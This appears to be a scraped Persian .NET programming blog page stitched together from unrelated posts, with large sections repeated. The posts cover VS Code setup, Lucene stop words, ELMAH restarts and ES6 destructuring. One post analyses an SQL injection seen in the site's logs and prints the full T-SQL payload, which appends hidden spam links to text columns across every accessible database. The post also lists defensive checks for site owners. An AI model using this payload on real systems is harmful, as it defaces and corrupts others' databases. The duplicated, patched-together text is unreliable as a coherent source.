اشتراکها
VS Code یک محیط توسعهی یکپارچه است که توسط مایکروسافت توسعه پیدا میکند و دارای مزایای ذیل است:
- سبک وزن است
- بسیار سریع است
- به صورت سورس باز توسعه پیدا میکند
- رایگان است
- چندسکویی است
- انواع و اقسام زبانهای برنامه نویسی را پشتیبانی میکند
- پشتیبانی بسیار مناسبی را از طرف جامعهی برنامه نویسان به همراه دارد
- به همراه تعداد زیادی افزونه است
هدف اصلی از توسعهی آن نیز ارائهی تجربهی کاربری یکسانی در سکوهای کاری مختلف و زبانهای متفاوت برنامه نویسی است. در اینجا مهم نیست که از ویندوز، مک یا لینوکس استفاده میکنید. نحوهی کار کردن با آن در این سکوهای کاری تفاوتی نداشته و یکسان است. همچنین برای آن تفاوتی نمیکند که با PHP کار میکنید یا ASP.NET. تمام گروههای مختلف برنامه نویسان دسترسی به یک IDE بسیار سریع و سبک وزن را خواهند داشت.
برخلاف نگارش کامل ویژوال استودیو که این روزها حجم دریافت آن به بالای 20 گیگابایت رسیدهاست، VS Code با هدف سبک وزن بودن و سادگی دریافت و نصب، طراحی و توسعه پیدا میکند. این مورد، مزیت دریافت به روز رسانیهای منظم را بدون نگرانی از دریافت حجمهای بالا، برای بسیاری از علاقمندان مسیر میکند.
همچنین برای کار با نگارشهای جدیدتر ASP.NET Core، دیگر نیازی به دریافت آخرین به روز رسانیهای چندگیگابایتی ویژوال استودیوی کامل نبوده و میتوان کاملا مستقل از آن، از آخرین نگارش NET Core. و ASP.NET Core به سادگی در VSCode استفاده کرد.
نصب VS Code بر روی ویندوز
آخرین نگارش این محصول را از آدرس https://code.visualstudio.com میتوانید دریافت کنید. نصب آن نیز بسیار سادهاست؛ فقط گزینهی Add to PATH را نیز در حین نصب حتما انتخاب نمائید (هرچند به صورت پیش فرض نیز انتخاب شدهاست). به این ترتیب امکان استفادهی از آن در کنسولهای متفاوتی مسیر خواهد شد.
در ادامه فرض کنید که مسیر D:\vs-code-examples\sample01 حاوی اولین برنامهی ما خواهد بود. برای اینکه در اینجا بتوانیم، تجربهی کاربری یکسانی را مشاهده کنیم، از طریق خط فرمان به این پوشه وارد شده و دستور ذیل را صادر میکنیم:
به این ترتیب کل پوشهی sample01 در VS Code باز خواهد شد.
نصب VS Code بر روی Mac
نصب VS Code بر روی مک یا لینوکس نیز به همین ترتیب است و زمانیکه به آدرس فوق مراجعه میکنید، به صورت خودکار نوع سیستم عامل را تشخیص داده و بستهی متناسبی را به شما پیشنهاد میکند. پس از دریافت بستهی آن برای مک، یک application را دریافت خواهید کرد که آنرا میتوان به مجموعهی Applications سیستم اضافه کرد. تنها تفاوت تجربهی نصب آن با ویندوز، انتخاب گزینهی Add to PATH آن است و به صورت پیش فرض نمیتوان آنرا از طریق ترمینال در هر مکانی اجرا کرد. برای این منظور، پس از اجرای اولیهی VS Code، دکمههای Ctrl/Command+Shift+P را در VS Code فشرده و سپس path را جستجو کنید (در دستور یاد شده، Ctrl برای ویندوز و لینوکس است و Command برای Mac):
در اینجا گزینهی install 'code' command path را انتخاب کنید تا بتوان VS Code را از طریق ترمینال نیز به سادگی اجرا کرد. به این ترتیب امکان اجرای دستور . code که بر روی ویندوز نیز ذکر شد، در اینجا نیز میسر خواهد بود.
نصب VS Code بر روی لینوکس
در اینجا نیز با مراجعهی به آدرس https://code.visualstudio.com، بستهی متناسب با لینوکس، جهت دریافت پیشنهاد خواهد شد؛ برای مثال بستههای deb. برای توزیعهایی مانند اوبونتو و یا rpm. برای ردهت. به علاوه اگر بر روی علامت ^ کنار بستههای دانلود کلیک کنید، یک بستهی tar.gz. نیز قابل دریافت خواهد بود. تجربهی نصب آن نیز همانند نمونهی ویندوز است و Add to PATH آن به صورت خودکار انجام خواهد شد.
بررسی ابتدایی محیط VS Code
VS Code بر اساس فایلهای قرار گرفتهی در یک پوشه و زیر پوشههای آن کار میکند. به همین جهت پس از صدور دستور . code، آن پوشه را در IDE خود نمایش خواهد داد. در اینجا برخلاف نگارش کامل ویژوال استودیو، روش کار، مبتنی بر یک فایل پروژه نیست و اگر خارج از VS Code نیز فایلی را به پوشهی باز شده اضافه کنید، بلافاصله تشخیص داده شده و در اینجا لیست میشود. هرچند یک چنین تجربهی کاربری با پروژههای ASP.NET Core نیز در نگارشهای جدیدتر ویژوال استودیوی کامل، سعی شدهاست شبیه سازی شود؛ برخلاف سایر پروژههای ویژوال استودیو که اگر فایلی در فایل پروژهی آن مدخلی نداشته باشد، به صورت پیش فرض نمایش داده نشده و درنظر گرفته نمیشود.
در ادامه برای نمونه از طریق منوی File->New File، یک فایل جدید را اضافه میکنیم. هرچند میتوان اشارهگر ماوس را بر روی نام پوشه نیز برده و از دکمههای نوار ابزار آن نیز برای ایجاد یک فایل و یا پوشهی جدید نیز استفاده کرد:
در اینجا فرمت ابتدایی فایل جدید را plain text تشخیص میدهد:
برای تغییر این حالت یا میتوان فایل را ذخیره کرد و پسوند مناسبی را برای آن انتخاب نمود و یا در همان status bar پایین صفحه، بر روی plain text کلیک کنید تا منوی انتخاب زبان ظاهر شود:
به این ترتیب پیش از ذخیرهی فایل با پسوندی مناسب نیز میتوان زبان مدنظر را تنظیم کرد. پس از آن، intellisense و syntax highlighting متناسب با آن زبان در دسترس خواهند بود.
بررسی تنظیمات VS Code
از طریق منوی File->Preferences->Settings میتوان به تنظیمات VS Code دسترسی یافت.
در اینجا در سمت چپ، لیست تنظیمات مهیا و پیش فرض این محیط قرار دارند و در سمت راست میتوان این پیش فرضها را (پس از بررسی و جستجوی آنها در پنل سمت چپ) بازنویسی و سفارشی سازی کرد.
تنظیمات انجام شدهی در اینجا را میتوان به پوشهی جاری نیز محدود کرد. برای این منظور بر روی لینک work space settings در کنار لینک user settings در تصویر فوق کلیک کنید. در این حالت یک فایل json را در پوشهی vscode. نمای جاری VSCode، ایجاد خواهد کرد (sample01\.vscode\settings.json) که میتواند در برگیرندهی تنظیمات سفارشی محدود و مختص به این پروژه و یا نما باشد.
یک نکته: تمام گزینههای منوی VS Code را و حتی مواردی را که در منوها لیست نشدهاند، میتوانید در Command Pallet آن با فشردن دکمههای Ctrl/Command+Shift+P نیز مشاهده کنید و به علاوه جستجوی آن نیز بسیار سریعتر است از دسترسی و کار مستقیم با منوها.
همچنین در اینجا اگر قصد یافتن سریع فایلی را داشته باشید، میتوانید دکمههای Ctrl/Command+P را فشرده و سپس نام فایل را جستجو کرد:
این دو دستور، جزو دستورات پایهای این IDE هستند و مدام از آنها استفاده میشود.
نصب افزونهی #C
اولین افزونهای را که جهت کار با ASP.NET Core نیاز خواهیم داشت، افزونهی #C است. برای این منظور در نوار ابزار عمودی سمت چپ صفحه، گزینهی Extensions را انتخاب کنید:
در اینجا افزونهی #C مایکروسافت را جستجو کرده و نصب کنید. نصب آن نیز بسیار ساده است. با حرکت اشارهگر ماوس بر روی آن، دکمهی install ظاهر میشود یا حتی اگر آنرا در لیست انتخاب کنیم، در سمت راست صفحه علاوه بر مشاهدهی جزئیات آن، دکمههای نصب و عزل نیز ظاهر خواهند شد.
تجربهی کاربری محیط نصب افزونههای آن نیز نسبت به نگارش کامل ویژوال استودیو، بسیار بهتر است. برای نمونه اگر به تصویر فوق دقت کنید، در همینجا میتوان جزئیات کامل افزونه، نویسنده یا نویسندگان آن و یا لیست تغییرات و وابستگیهای آنرا نیز بدون خروج از VSCode مشاهده و بررسی کرد. همچنین در دفعات بعدی اجرای VSCode، کار بررسی و نصب به روز رسانیهای این افزونهها نیز خودکار بوده و نیازی به بررسی دستی آنها نیست.
پس از نصب، دکمهی reload را ظاهر کرده و با کلیک بر روی آن، محیط جاری به صورت خودکار بارگذاری مجدد شده و بلافاصله قابل استفادهاست.
در قسمت بعد، اولین پروژهی ASP.NET Core خود را در VS Code ایجاد خواهیم کرد.
- سبک وزن است
- بسیار سریع است
- به صورت سورس باز توسعه پیدا میکند
- رایگان است
- چندسکویی است
- انواع و اقسام زبانهای برنامه نویسی را پشتیبانی میکند
- پشتیبانی بسیار مناسبی را از طرف جامعهی برنامه نویسان به همراه دارد
- به همراه تعداد زیادی افزونه است
هدف اصلی از توسعهی آن نیز ارائهی تجربهی کاربری یکسانی در سکوهای کاری مختلف و زبانهای متفاوت برنامه نویسی است. در اینجا مهم نیست که از ویندوز، مک یا لینوکس استفاده میکنید. نحوهی کار کردن با آن در این سکوهای کاری تفاوتی نداشته و یکسان است. همچنین برای آن تفاوتی نمیکند که با PHP کار میکنید یا ASP.NET. تمام گروههای مختلف برنامه نویسان دسترسی به یک IDE بسیار سریع و سبک وزن را خواهند داشت.
برخلاف نگارش کامل ویژوال استودیو که این روزها حجم دریافت آن به بالای 20 گیگابایت رسیدهاست، VS Code با هدف سبک وزن بودن و سادگی دریافت و نصب، طراحی و توسعه پیدا میکند. این مورد، مزیت دریافت به روز رسانیهای منظم را بدون نگرانی از دریافت حجمهای بالا، برای بسیاری از علاقمندان مسیر میکند.
همچنین برای کار با نگارشهای جدیدتر ASP.NET Core، دیگر نیازی به دریافت آخرین به روز رسانیهای چندگیگابایتی ویژوال استودیوی کامل نبوده و میتوان کاملا مستقل از آن، از آخرین نگارش NET Core. و ASP.NET Core به سادگی در VSCode استفاده کرد.
نصب VS Code بر روی ویندوز
آخرین نگارش این محصول را از آدرس https://code.visualstudio.com میتوانید دریافت کنید. نصب آن نیز بسیار سادهاست؛ فقط گزینهی Add to PATH را نیز در حین نصب حتما انتخاب نمائید (هرچند به صورت پیش فرض نیز انتخاب شدهاست). به این ترتیب امکان استفادهی از آن در کنسولهای متفاوتی مسیر خواهد شد.
در ادامه فرض کنید که مسیر D:\vs-code-examples\sample01 حاوی اولین برنامهی ما خواهد بود. برای اینکه در اینجا بتوانیم، تجربهی کاربری یکسانی را مشاهده کنیم، از طریق خط فرمان به این پوشه وارد شده و دستور ذیل را صادر میکنیم:
D:\vs-code-examples\sample01>code .
نصب VS Code بر روی Mac
نصب VS Code بر روی مک یا لینوکس نیز به همین ترتیب است و زمانیکه به آدرس فوق مراجعه میکنید، به صورت خودکار نوع سیستم عامل را تشخیص داده و بستهی متناسبی را به شما پیشنهاد میکند. پس از دریافت بستهی آن برای مک، یک application را دریافت خواهید کرد که آنرا میتوان به مجموعهی Applications سیستم اضافه کرد. تنها تفاوت تجربهی نصب آن با ویندوز، انتخاب گزینهی Add to PATH آن است و به صورت پیش فرض نمیتوان آنرا از طریق ترمینال در هر مکانی اجرا کرد. برای این منظور، پس از اجرای اولیهی VS Code، دکمههای Ctrl/Command+Shift+P را در VS Code فشرده و سپس path را جستجو کنید (در دستور یاد شده، Ctrl برای ویندوز و لینوکس است و Command برای Mac):
در اینجا گزینهی install 'code' command path را انتخاب کنید تا بتوان VS Code را از طریق ترمینال نیز به سادگی اجرا کرد. به این ترتیب امکان اجرای دستور . code که بر روی ویندوز نیز ذکر شد، در اینجا نیز میسر خواهد بود.
نصب VS Code بر روی لینوکس
در اینجا نیز با مراجعهی به آدرس https://code.visualstudio.com، بستهی متناسب با لینوکس، جهت دریافت پیشنهاد خواهد شد؛ برای مثال بستههای deb. برای توزیعهایی مانند اوبونتو و یا rpm. برای ردهت. به علاوه اگر بر روی علامت ^ کنار بستههای دانلود کلیک کنید، یک بستهی tar.gz. نیز قابل دریافت خواهد بود. تجربهی نصب آن نیز همانند نمونهی ویندوز است و Add to PATH آن به صورت خودکار انجام خواهد شد.
بررسی ابتدایی محیط VS Code
VS Code بر اساس فایلهای قرار گرفتهی در یک پوشه و زیر پوشههای آن کار میکند. به همین جهت پس از صدور دستور . code، آن پوشه را در IDE خود نمایش خواهد داد. در اینجا برخلاف نگارش کامل ویژوال استودیو، روش کار، مبتنی بر یک فایل پروژه نیست و اگر خارج از VS Code نیز فایلی را به پوشهی باز شده اضافه کنید، بلافاصله تشخیص داده شده و در اینجا لیست میشود. هرچند یک چنین تجربهی کاربری با پروژههای ASP.NET Core نیز در نگارشهای جدیدتر ویژوال استودیوی کامل، سعی شدهاست شبیه سازی شود؛ برخلاف سایر پروژههای ویژوال استودیو که اگر فایلی در فایل پروژهی آن مدخلی نداشته باشد، به صورت پیش فرض نمایش داده نشده و درنظر گرفته نمیشود.
در ادامه برای نمونه از طریق منوی File->New File، یک فایل جدید را اضافه میکنیم. هرچند میتوان اشارهگر ماوس را بر روی نام پوشه نیز برده و از دکمههای نوار ابزار آن نیز برای ایجاد یک فایل و یا پوشهی جدید نیز استفاده کرد:
در اینجا فرمت ابتدایی فایل جدید را plain text تشخیص میدهد:
برای تغییر این حالت یا میتوان فایل را ذخیره کرد و پسوند مناسبی را برای آن انتخاب نمود و یا در همان status bar پایین صفحه، بر روی plain text کلیک کنید تا منوی انتخاب زبان ظاهر شود:
به این ترتیب پیش از ذخیرهی فایل با پسوندی مناسب نیز میتوان زبان مدنظر را تنظیم کرد. پس از آن، intellisense و syntax highlighting متناسب با آن زبان در دسترس خواهند بود.
بررسی تنظیمات VS Code
از طریق منوی File->Preferences->Settings میتوان به تنظیمات VS Code دسترسی یافت.
در اینجا در سمت چپ، لیست تنظیمات مهیا و پیش فرض این محیط قرار دارند و در سمت راست میتوان این پیش فرضها را (پس از بررسی و جستجوی آنها در پنل سمت چپ) بازنویسی و سفارشی سازی کرد.
تنظیمات انجام شدهی در اینجا را میتوان به پوشهی جاری نیز محدود کرد. برای این منظور بر روی لینک work space settings در کنار لینک user settings در تصویر فوق کلیک کنید. در این حالت یک فایل json را در پوشهی vscode. نمای جاری VSCode، ایجاد خواهد کرد (sample01\.vscode\settings.json) که میتواند در برگیرندهی تنظیمات سفارشی محدود و مختص به این پروژه و یا نما باشد.
یک نکته: تمام گزینههای منوی VS Code را و حتی مواردی را که در منوها لیست نشدهاند، میتوانید در Command Pallet آن با فشردن دکمههای Ctrl/Command+Shift+P نیز مشاهده کنید و به علاوه جستجوی آن نیز بسیار سریعتر است از دسترسی و کار مستقیم با منوها.
همچنین در اینجا اگر قصد یافتن سریع فایلی را داشته باشید، میتوانید دکمههای Ctrl/Command+P را فشرده و سپس نام فایل را جستجو کرد:
این دو دستور، جزو دستورات پایهای این IDE هستند و مدام از آنها استفاده میشود.
نصب افزونهی #C
اولین افزونهای را که جهت کار با ASP.NET Core نیاز خواهیم داشت، افزونهی #C است. برای این منظور در نوار ابزار عمودی سمت چپ صفحه، گزینهی Extensions را انتخاب کنید:
در اینجا افزونهی #C مایکروسافت را جستجو کرده و نصب کنید. نصب آن نیز بسیار ساده است. با حرکت اشارهگر ماوس بر روی آن، دکمهی install ظاهر میشود یا حتی اگر آنرا در لیست انتخاب کنیم، در سمت راست صفحه علاوه بر مشاهدهی جزئیات آن، دکمههای نصب و عزل نیز ظاهر خواهند شد.
تجربهی کاربری محیط نصب افزونههای آن نیز نسبت به نگارش کامل ویژوال استودیو، بسیار بهتر است. برای نمونه اگر به تصویر فوق دقت کنید، در همینجا میتوان جزئیات کامل افزونه، نویسنده یا نویسندگان آن و یا لیست تغییرات و وابستگیهای آنرا نیز بدون خروج از VSCode مشاهده و بررسی کرد. همچنین در دفعات بعدی اجرای VSCode، کار بررسی و نصب به روز رسانیهای این افزونهها نیز خودکار بوده و نیازی به بررسی دستی آنها نیست.
پس از نصب، دکمهی reload را ظاهر کرده و با کلیک بر روی آن، محیط جاری به صورت خودکار بارگذاری مجدد شده و بلافاصله قابل استفادهاست.
در قسمت بعد، اولین پروژهی ASP.NET Core خود را در VS Code ایجاد خواهیم کرد.
به صورت خلاصه اگر نیاز به جستجوی سریع و پیشرفتهای بر روی حجم عظیمی از اطلاعات دارید، روش متداول select * from table where field like something توصیه نمیشود. بسیار کند است؛ مصرف CPU بالایی دارد. از ایندکس استفاده نمیکند.
راه حل توصیه شده جهت برخورد با این نوع مسایل استفاده از full text search است. نگارش کامل SQL Server حاوی یک موتور FTS توکار هست . اگر از بانک اطلاعاتی خاصی استفاده میکنید که دارای موتور FTS نیست یا ... FTS مخصوص SQL Server به درد کار شما نمیخورد یا نیاز به سفارشی سازی دارد (مثلا امکان تعریف stop words فارسی (کلماتی مانند به، از، تا و امثال آن))، از موتور FTS جانبی دیگری به نام لوسین نیز میتوان استفاده کرد.
در کنار اینها ابزاری برای آنالیز و کوئری گرفتن از فایلهای ایندکس تهیه شده توسط لوسین نیز وجود دارد به نام Luke. برای نمونه اگر بانک اطلاعاتی سایت جاری را با لوسین به نحو متداولی ایندکس کنیم، در صفحه اول این برنامه، top ranking terms آن به شکل زیر ظاهر میشود:
در اینجا چون متون تهیه شده از نوع HTML هستند، تگ br در آنها زیاد است و یا یک سری حروف و کلمات فارسی هم در صدر قرار دارند که بهتر است از لیست ایندکس حذف شوند. برای اینکار تنها کافی است یک hash table را به نحو زیر تعریف و به StandardAnalyzer لوسین ارسال کنیم:
یا آقای عرب عامری برای حروف و کلمات فارسی که نباید ایندکس شوند، یک لیست نسبتا جامع را در اینجا تهیه کردهاند.
اینبار اگر stop words یاد شده را اعمال و مجددا ایندکسها را تهیه کنیم به خروجی بهتری خواهیم رسید.
در کل حداقل از این لحاظ، لوسین نسبت به FTS توکار SQL Server مناسبتر به نظر میرسد.
راه حل توصیه شده جهت برخورد با این نوع مسایل استفاده از full text search است. نگارش کامل SQL Server حاوی یک موتور FTS توکار هست . اگر از بانک اطلاعاتی خاصی استفاده میکنید که دارای موتور FTS نیست یا ... FTS مخصوص SQL Server به درد کار شما نمیخورد یا نیاز به سفارشی سازی دارد (مثلا امکان تعریف stop words فارسی (کلماتی مانند به، از، تا و امثال آن))، از موتور FTS جانبی دیگری به نام لوسین نیز میتوان استفاده کرد.
در کنار اینها ابزاری برای آنالیز و کوئری گرفتن از فایلهای ایندکس تهیه شده توسط لوسین نیز وجود دارد به نام Luke. برای نمونه اگر بانک اطلاعاتی سایت جاری را با لوسین به نحو متداولی ایندکس کنیم، در صفحه اول این برنامه، top ranking terms آن به شکل زیر ظاهر میشود:
در اینجا چون متون تهیه شده از نوع HTML هستند، تگ br در آنها زیاد است و یا یک سری حروف و کلمات فارسی هم در صدر قرار دارند که بهتر است از لیست ایندکس حذف شوند. برای اینکار تنها کافی است یک hash table را به نحو زیر تعریف و به StandardAnalyzer لوسین ارسال کنیم:
var stopWords = new Hashtable(); stopWords.Add("br","br"); // ... var analyzer = new StandardAnalyzer(Version.LUCENE_29, stopWords);
یا آقای عرب عامری برای حروف و کلمات فارسی که نباید ایندکس شوند، یک لیست نسبتا جامع را در اینجا تهیه کردهاند.
اینبار اگر stop words یاد شده را اعمال و مجددا ایندکسها را تهیه کنیم به خروجی بهتری خواهیم رسید.
در کل حداقل از این لحاظ، لوسین نسبت به FTS توکار SQL Server مناسبتر به نظر میرسد.
- لیست زبانهای برنامه نویسی محبوب در ماه آوریل 2009؛ سی شارپ یک پله صعود نسبت به سال قبل، زبان برنامه نویسی MATLAB مجددا وارد لیست شده
- اولین محصول نگارش 2010 مایکروسافت برای دریافت، exchange server 2010 beta (میل سرور)
سایر اولین سری محصولات 2010 ، شامل Microsoft Office 2010 ، Microsoft Visio 2010 و Microsoft Project 2010 خواهند بود.
- مجموعه انتشارات مایکروسافت 25 امین سالگرد تاسیس خود را جشن میگیرد. به همین منظور دو کتاب زیر را به رایگان برای دریافت قرار دادهاند:
عنوانی رو که براش انتخاب کردن جالب است "the world's most advanced open source database"
مدتی هست در لاگهای ELMAH سایت، یک چنین تزریقهای اس کیوال ناموفقی مشاهده میشوند:
اگر اخیرا به دیتابیس شما رکوردهایی با divهای نامرئی ("div style="display:none) که داخل آنها تبلیغات یک سری سایتهای کذایی وجود دارند، اضافه شدهاند، حتما مورد حملهی SQL Injection فوق واقع شدهاید.
مواردی را که باید بررسی کنید:
الف) آیا در سایت، قسمت ثبت ارجاعات را دارید؟
قبل از اینکه HTTP Referrer را بررسی کنید، یکبار آنرا به عنوان پارامتر سازندهی new Uri قرار دهید. به این صورت این حمله دقیقا در همین مرحله، با صدور یک استثناء، به علت معتبر نبودن آدرس دریافتی متوقف میشود:
ب) آیا در سایت، نوع مرورگرهای کاربران را نیز ذخیره میکنید؟
با توجه به شکل اول، این حمله تنها زمانی مؤثر خواهد بود که از کوئریهای غیرپارامتری و یا از ORMها استفاده نمیکنید.
ج) آیا به محتوای دریافت شدهی از طریق کوئری استرینگها دقت دارید؟
این مورد نیز همانند حالت ب است.
بررسی ساختار این حمله
کوئری ارسالی (البته با حذف آدرس سایتهای کذایی آن)، یک چنین فرمتی را دارد:
در اینجا ابتدا لیست بانکهای اطلاعاتی موجود دریافت میشوند. سپس با استفاده از try/catch سعی در به روز رسانی رکوردهای جداولی که دارای فیلدهایی از نوع varchar یا nvarchar از نوع max هستند، میکند. از try/catch هم به این دلیل استفاده کردهاست که در یک سایت اشتراکی، شما فقط به بانک اطلاعاتی خودتان دسترسی دارید و البته اگر از کاربر sa استفاده میکنید که ... هم اکنون تمام بانکهای اطلاعاتی شما آلوده شدهاند!
به روز رسانی آن هم رندام است. یعنی در یک سری رکورد، بر اساس case نوشته شده، تبلیغ خواندن و در یک سری دیگر، تبلیغ داستانی را در انتهای آنها درج میکند.
اگر اخیرا به دیتابیس شما رکوردهایی با divهای نامرئی ("div style="display:none) که داخل آنها تبلیغات یک سری سایتهای کذایی وجود دارند، اضافه شدهاند، حتما مورد حملهی SQL Injection فوق واقع شدهاید.
مواردی را که باید بررسی کنید:
الف) آیا در سایت، قسمت ثبت ارجاعات را دارید؟
قبل از اینکه HTTP Referrer را بررسی کنید، یکبار آنرا به عنوان پارامتر سازندهی new Uri قرار دهید. به این صورت این حمله دقیقا در همین مرحله، با صدور یک استثناء، به علت معتبر نبودن آدرس دریافتی متوقف میشود:
ب) آیا در سایت، نوع مرورگرهای کاربران را نیز ذخیره میکنید؟
با توجه به شکل اول، این حمله تنها زمانی مؤثر خواهد بود که از کوئریهای غیرپارامتری و یا از ORMها استفاده نمیکنید.
ج) آیا به محتوای دریافت شدهی از طریق کوئری استرینگها دقت دارید؟
این مورد نیز همانند حالت ب است.
بررسی ساختار این حمله
کوئری ارسالی (البته با حذف آدرس سایتهای کذایی آن)، یک چنین فرمتی را دارد:
DECLARE @b AS CURSOR; DECLARE @s AS VARCHAR (8000); DECLARE @w AS VARCHAR (99); SET @b = CURSOR FOR SELECT DB_NAME() UNION SELECT name FROM sys.databases WHERE (has_dbaccess(name) != 0) AND name NOT IN ('master', 'tempdb', 'model', 'msdb', DB_NAME()); OPEN @b; FETCH NEXT FROM @b INTO @w; WHILE @@FETCH_STATUS = 0 BEGIN SET @s = 'begin try use ' + @w + ';declare @c cursor;declare @d varchar(4000);set @c=cursor for select ''update [''+TABLE_NAME+''] set [''+COLUMN_NAME+'']=[''+COLUMN_NAME+'']+case ABS(CHECKSUM(NewId()))%10 when 0 then ''''<div style="display:none">desi adult stories <a href="http://www.site.com/">''''+case ABS(CHECKSUM(NewId()))%3 when 0 then ''''stories'''' when 1 then ''''read'''' else ''''stories'''' end +''''</a> stories</div>'''' else '''''''' end'' FROM sysindexes AS i INNER JOIN sysobjects AS o ON i.id=o.id INNER JOIN INFORMATION_SCHEMA.COLUMNS ON o.NAME=TABLE_NAME WHERE(indid in (0,1)) and DATA_TYPE like ''%varchar'' and(CHARACTER_MAXIMUM_LENGTH in (2147483647,-1));open @c;fetch next from @c into @d;while @@FETCH_STATUS=0 begin exec (@d);fetch next from @c into @d;end;close @c end try begin catch end catch'; EXECUTE (@s); FETCH NEXT FROM @b INTO @w; END CLOSE @b;
به روز رسانی آن هم رندام است. یعنی در یک سری رکورد، بر اساس case نوشته شده، تبلیغ خواندن و در یک سری دیگر، تبلیغ داستانی را در انتهای آنها درج میکند.
اگر در برنامهی وب خود از ELMAH استفاده میکنید و استثنایی در روال رخدادگردان Application_Start واقع در فایل global.asax.cs رخ دهد، این استثناء در لاگهای ELMAH ظاهر نمیشود و صرفا در لاگهای خود ویندوز قابل مطالعه خواهد بود؛ از این جهت که HttpContext.Current در این روال هنوز ایجاد نشدهاست. همچنین اگر از IoC Containers استفاده میکنید یا آغاز بانک اطلاعاتی ORM خود را در روال Application_Start قرار دادهاید، تمام اینها نیز آغاز نشده باقی خواهند ماند و عملا تا ری استارت بعدی برنامه یا IIS در سرور به صورت دستی، برنامه و سایت قابل استفاده نخواهد بود.
سؤال: آیا میتوان از ریاستارت دستی IIS، به ریاستارت خودکار رسید؟
پاسخ: بلی. فراخوانی متد HttpRuntime.UnloadAppDomain در یک برنامهی ASP.NET سبب ری استارت آن خواهد شد. بنابراین میتوان این متد را در Application_Start برنامه، جهت ریاستارت خودکار آن در صورت شکست اولیه Application_Start قرار داد:
اهمیت این مساله از آنجا ناشی میشود که ممکن است در آن لحظهی خاص، بار سرور زیاد بوده باشد یا حتی میزان حافظه مهیای جهت آغاز برنامه کافی نبوده باشد؛ و نه الزاما مشکل منطقی در کدهای برنامه. فراخوانی HttpRuntime.UnloadAppDomain سبب خواهد شد تا برنامه شانس مجدد اجرای دیگری را بدون نیازی به ری استارت دستی IIS بیابد.
سؤال: آیا میتوان از ریاستارت دستی IIS، به ریاستارت خودکار رسید؟
پاسخ: بلی. فراخوانی متد HttpRuntime.UnloadAppDomain در یک برنامهی ASP.NET سبب ری استارت آن خواهد شد. بنابراین میتوان این متد را در Application_Start برنامه، جهت ریاستارت خودکار آن در صورت شکست اولیه Application_Start قرار داد:
void Application_Start(object sender, EventArgs e) { try { // startup stuff } catch { HttpRuntime.UnloadAppDomain(); // سبب ری استارت برنامه و آغاز مجدد آن با درخواست بعدی میشود throw; } }
مطالب
پارامترها در ES 6
Destructuring assignment این امکان را به ES 6 اضافه کردهاست تا بتوان خواص یک شیء یا اعضای یک آرایه را با سهولت بیشتری به متغیرها نسبت داد و نگارش آن بسیار شبیه است به تعریف اشیاء یا آرایهها در جاوا اسکریپت.
Destructuring Arrays
بدون استفاده از Destructuring assignment برای دسترسی به اعضای یک آرایه و انتساب آنها به متغیرهای مختلف، روش متداول زیر مرسوم است:
اما با استفاده از Destructuring assignment این سه سطر، تبدیل به یک سطر میشوند:
همانطور که ملاحظه میکنید، سمت چپ این انتساب، بسیار شبیه است به تعریف یک آرایه، اما در اینجا مفهوم Destructuring assignment را دارد و سه متغیر جدید را تعریف میکند.
یک مثال:
در اینجا ترکیبی از Destructuring assignment و بهبودهای کار با رشتهها را در ES 6، ملاحظه میکنید. سمت چپ انتساب، سه متغیر جدید را تعریف کردهاست که این سه متغیر با سه عضو اول آرایه مقدار دهی میشوند.
همچنین در این مثال اگر علاقمند بودیم صرفا به اعضای اول و چهارم این آرایه دسترسی پیدا کنیم، میتوان نوشت:
تعریف یک کامای خالی، سبب پرش به عضو بعدی خواهد شد و به معنای صرفنظر کردن از ایندکس مطرح شدهاست. برای مثال در اینجا از ایندکسهای 2 و 3 صرفنظر شدهاست.
امکان دسترسی به اعضای تو در تو نیز با Destructuring assignment پیش بینی شدهاست:
در مثال فوق، دومین عضو آرایه، خود نیز یک آرایهاست. برای دسترسی به این آرایهی دوم، دومین عضو Destructuring assignment نیز باید یک Destructuring assignment جدید باشد.
میتوان از Destructuring assignment جهت جابجایی مقادیر متغیرها بدون انتساب به یک متغیر موقتی نیز استفاده کرد:
در این مثال ابتدا یک آرایه با دو عضو تعریف شدهاست. سپس اعضای این آرایه به دو متغیر جدید xVal و yVal انتساب یافتهاند. در ادامه در سطر سوم، مقادیر این دو متغیر با هم تعویض شدهاند.
Destructuring Objects
امکانات Destructuring assignment، به کار با آرایهها محدود نمیشود و از آن میتوان برای کار با اشیاء نیز استفاده کرد. فرض کنید شیء pouch به صورت زیر تعریف شدهاست:
روش متداول دسترسی به خاصیت coins، به صورت pouch.coins است:
اما با استفاده از Destructuring assignment میتوان نوشت (در حالت کار با اشیاء، بجای [] از {} استفاده میشود):
در این مثال، خاصیت coins شیء pouch به متغیر جدید coins انتساب داده شدهاست. نکتهای که در اینجا باید به آن دقت داشت، همنامی متغیر جدید coins با خاصیت coins است. اگر بخواهیم این خاصیت را به یک متغیر غیرهمنام انتساب دهیم، باید به صورت زیر عمل کرد:
در مثال فوق، مقدار خاصیت coins به متغیر جدیدی با نام newVar1 انتساب داده شدهاست.
در اینجا نیز امکان کار با اشیای تو در تو، پیش بینی شدهاست:
در این مثال، خاصیت z شیء point نیز خود یک شیء دیگر است. برای دسترسی به آن همانند کار با آرایهها نیاز است از یک {} دیگر برای استخراج خواص one و two استفاده کرد.
در انتساب فوق، خاصیت x شیء point به متغیر جدید a، خاصیت y شیء point به متغیر جدید b و خاصیت one شیء منتسب به خاصیت z، به متغیر c و خاصیت two شیء منتسب به خاصیت z، به متغیر d انتساب یافتهاند.
ترکیب Destructuring Objects و Destructuring Arrays
در مثال زیر، نمونهای ترکیبی از Destructuring اشیاء و آرایهها را با هم مشاهده میکنید:
در این مثال، خاصیت one شیء mixed به متغیر جدید a، خاصیت two آن به متغیر جدید b و اعضای اول و سوم آرایهی values به متغیرهای جدید c و e انتساب داده شدهاند. از ایندکس دوم آرایهی values نیز با معرفی یک کاما، صرفنظر گردیدهاست.
Destructuring Function Arguments
از Destructuring در حین تعریف پارامترهای متدها نیز میتوان استفاده کرد.
در این مثال، متد removeBreakpoint دارای سه پارامتر ورودی تعریف شدهی توسط Destructuring است. در این حالت این پارامترها به صورت خودکار از شیء ارسالی به این متد دریافت و مقدار دهی خواهند شد.
و یا برای مثال در زبان #C امکان تعریف named arguments (آرگومانهای نامدار) و همچنین تعریف مقادیر پیش فرضی برای آنها وجود دارد. در اینجا نیز میتوان با استفاده از Destructuring به تعریفی مشابه آن برای ارائهی آرگومانهایی با مقادیر پیش فرض رسید:
